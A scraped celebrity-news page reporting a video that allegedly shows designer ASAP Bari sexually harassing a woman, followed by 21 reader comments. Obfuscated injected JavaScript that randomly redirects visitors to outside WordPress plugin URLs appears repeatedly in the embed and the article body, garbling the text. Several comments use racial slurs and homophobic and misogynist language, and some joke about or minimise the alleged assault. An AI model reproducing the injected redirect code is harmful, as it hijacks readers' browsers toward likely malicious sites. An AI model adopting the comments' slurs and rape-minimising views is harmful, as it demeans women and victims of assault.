ASAP Bari Accused of Sexual Harassment After Graphic Video Surfaces

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=1&autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=1″ frameborder=”0″ allowfullscreen>

Video alleging toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to show VLONE designer ASAP Bari sexually harassing a woman hit the internet.

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21 thoughts on “ASAP Bari Accused of Sexual Harassment After Graphic Video Surfaces”

  1. BEmagiK says:


  2. BEmagiK says:

    Complex be blowing A$AP Y'all Late

  3. thavibez says:

    these niggaz gotta use money and fame to get girls because they have no real game to make the panties drop. these dudes are suckas

  4. Trap Soul says:

    Hell Nah. This is not cool at all. This is not how treat the pussy. Burn your vlone.

  5. carlos g says:

    yeah boy , justice came for you

  6. jude1900 2kq6 says:

    Lil asap they dont wanna see u winninnng

  7. investigate 3/11 says:

    fuck him, that's what the fucker gets for ripping people off with that gay ass vlone shit

  8. investigate 3/11 says:

    Always $trive And Prosper to get as little as consent as possible

  9. Will 2k says:

    Nigga need to be charged..
    goofy ass

  10. Manuel says:

    Damn Bari shoulda just left that girl Vlone

  11. KingCole says:

    Bari ain't rockin bape anymore, he rockin rape

  12. TheJewishBatman says:

    I don't think that's harrasment I think that's straight up assault

  13. gorez lamb says:


  14. 1337Industries says:

    "Designer of Vlone", can you even call Vlone shit designs tho ?

  15. ITzDotzy says:

    video on my channel

  16. SmokingDead says:

    Guys you have to keep in mind that these are the things that we actually can see, imagine what we can't…
    You simply don't treat a woman like that. Whoever she is.
    I always saw some kind of anger in Bari's eyes. He can be disapointed, he's an animal.
    The others members of ASAP better take position and remember everyone the values of respect and equality that ASAP stands up for.

  17. elie says:


  18. Jemar Lamb says:

    mannn I extensively searched for this video after realizing its not on youtube. Minus a " white bitch " crying , it wasnt even that badd. U cant assume what happened before or prior to that 14 second video.. GROUPIE CULTURE, bitches get flippped everyday B. Its niggas gettin shot on youtube , but i couldnt find this white bitch crying and saying no.. come on mann.. its 2017 and Im done with humans.

  19. CapiTen10 says:

    Burn the coal pay the toll

  20. ben1349 says:

    he can bounce back. Tupac raped a woman and women still love him.

  21. Jordan Wililiams says:

    Pierce trynna look like dom Kennedy

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